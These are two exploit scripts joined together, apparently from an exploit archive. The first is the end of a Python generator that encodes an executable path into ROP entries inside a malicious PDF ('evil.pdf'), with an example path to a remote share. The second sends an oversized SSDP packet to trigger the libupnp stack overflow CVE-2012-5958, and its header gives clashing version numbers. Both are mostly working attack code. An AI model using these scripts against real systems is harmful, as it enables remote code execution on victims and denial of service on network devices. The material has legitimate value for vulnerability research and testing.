characters (bytes). Aborting!") exit(-1) #Copy path into 4 character (32 bit) words (max 11) word_array = [] for i in range(11): word = '' if len(path): word += path[0:4] if len(path) >= 4 else path path = path[len(word):] if len(word) < 4: word += chr(0) * (4 - len(word)) word_array.append(word) #Convert chars to hex values and format to "0xAABBCCDD" notation hex_array = [] for word in word_array: #Reverse byte order to fit little endian standard if(little_endian): word = word[::-1] #Write bytes to hex strings hex_string = '0x' for char in word: hex_string += char2hex(char)[2:] #strip the 0x off the byte here hex_array.append(hex_string) return hex_array #writes encoded path to rop array to match template def create_rop(hex_arr, start_index = '0c'): ord_array = [] index = int(start_index,16) for instruction in hex_arr: full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};" ord_array.append(full_instruction) index += 1 return ('\n'.join(ord_array)) if __name__ == '__main__': if len(sys.argv) != 3: print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>") print("-- EXAMPLES --") print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf") exit(-1) #Parse user args EXE_PATH = sys.argv[1] PDF_PATH = sys.argv[2] #Generate hex raw_hex = path_to_machine_code(EXE_PATH) print("[+] Machine Code:") for hex_word in raw_hex: print(hex_word) ord_string = create_rop(raw_hex) print("[+] Instructions to add:") print(ord_string) print("[+] Generating pdf...") print("\t- Filling template...") evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string) print("\t- Writing file...") with open(PDF_PATH,'w') as fd: fd.write(evil_pdf) print("[+] Generated pdf:",PDF_PATH)

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS) # Date: 2020-08-20 # Exploit Author: Patrik Lantz # Vendor Homepage: https://pupnp.sourceforge.io/ # Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download # Version: <= 1.6.6 # Tested on: Linux # CVE : CVE-2012-5958 import socket payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:" payload += "A"*324 + "BBBB" payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n" byte_message = bytes(payload) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(byte_message, ("239.255.255.250", 1900))